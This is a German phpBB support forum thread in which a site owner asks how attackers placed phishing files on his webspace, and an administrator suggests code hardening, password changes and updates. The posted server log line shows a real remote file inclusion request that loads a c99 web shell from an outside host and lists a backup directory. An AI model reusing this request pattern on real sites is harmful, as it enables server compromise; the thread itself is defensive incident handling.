Pishing Dateien

Sicherheit des Webservers, der Server und rund um phpBB
Antworten
diegoriv
Beiträge: 314
Registriert: Di 01.Feb, 2005 15:25
Wohnort: Wien
Kontaktdaten:

Pishing Dateien

Beitrag von diegoriv »

all-inkl hat heute Pishing Dateien auf unserem Webspace gefunden.

Nun bin ich damit beschäftigt die Seite wieder herzustellen und frage mich, wie ich herausfinde, woher die kommen.

Folgenden Logfile-Auszug hat mir der Support geschickt:
- [17/Jul/2009:01:51:32 +0200] "POST /calendar.php//language/lang_english/lang_main_album.php?phpbb_root_path=http%3A%2F%2Fxakforum.altnet.ru%2Ftmp_upload%2Ffiles%2Fc99shell.txt%3F&act=ls&d=%2Fwww%2Fhtdocs%2Fv130649%2Fbackup&sort=0a HTTP/1.1" 200 7675 "http://alpinum.at/calendar.php//languag ... up&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Leider verstehe ich davon rein gar nichts. calendar und lang_main_album haben beispielsweise nichts miteinander zu tun.

Was kann ich also aus dem Log rausholen? Wie und Wo setze ich an?

Danke
d.
[center]***********************************************************
Alpinum.at - Forum f?r Bergfreunde
***********************************************************[/center]
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Tjoar, in dem Log-Auszug steht diese Domain drinnen: forum.altnet.ru
Vielleicht ein Hinweis auf die Hacker, wobei das auch nur schwer zu beweisen wäre ;)

Wichtig ist aber zu erkennen, wie die eingebrochen sind.
Und zwar in die Datei lang_main_album.php!!

Dieses ist nämlich Teil eines in diesem Log-Auszug enthaltenen Links, mit dem ein Script auf deinem Webspace abgelegt wurde.

Was dagegen für zukünftige Einbrüche tun?
Alle(!!!!) Passwörter ändern und in diesem Fall folgende Änderungen an der Datei language/lang.../lang_main_album.php durchführen:

Code: Alles auswählen

#
#-----[ FIND ]-----
#
//
// Album Index
//

#
#-----[ BEFORE, ADD ]-----
#
if ( !defined('IN_PHPBB') )
{
	die("Hacking attempt");
}
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Holger
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger »

Sollte man das in allen lang-Dateien machen?
diegoriv
Beiträge: 314
Registriert: Di 01.Feb, 2005 15:25
Wohnort: Wien
Kontaktdaten:

Beitrag von diegoriv »

Danke oxpus für deine Analyse.
irgendwo in .ru nach einem Schuldigen zu suchen hab ich ohnehin nicht vor.

Dummerweise oder gscheiterweise startet meine lang_main_album mit

Code: Alles auswählen

if ( !defined('IN_PHPBB') )
{
   die('Hacking attempt');
   exit;
}
wie kam der Kerl trotzdem rein?
[center]***********************************************************
Alpinum.at - Forum f?r Bergfreunde
***********************************************************[/center]
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Er hat die Datei aufgerufen und damit ein Script "hinterrücks" mit drauf gepackt.
Je nach Absicherung des Boards und des Webservers ist er dann mehr oder weniger erfolgreich.
Ein Punkt ist eben die Prüfung der Konstante IN_PHPBB, aber bei weitem nicht alles.

Wie er es letztlich geschafft hat werde ich aus Sicherheitsgründen aber hier nicht diskutieren. Ich bitte hier um Verständnis.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
diegoriv
Beiträge: 314
Registriert: Di 01.Feb, 2005 15:25
Wohnort: Wien
Kontaktdaten:

Beitrag von diegoriv »

[quote="oxpus";p="88583"]Wie er es letztlich geschafft hat werde ich aus Sicherheitsgründen aber hier nicht diskutieren. Ich bitte hier um Verständnis.[/quote]

Volles Verständnis - kein Problem. Interessiert mich auch eher nur sekundär. Primär beschäftigt mich eher die Frage: Was kann ich dagegen tun?
[center]***********************************************************
Alpinum.at - Forum f?r Bergfreunde
***********************************************************[/center]
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Was du dagegen tun kannst?
Immer alle Updates einspielen, die es zu deinen eingesetzten Scripten gibt, keine "einfachen Passwörter" verwenden, Verzeichnisschutz einrichten, wo es Sinn macht (z. B. im Admin-Ordner des Forums), etc...
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Antworten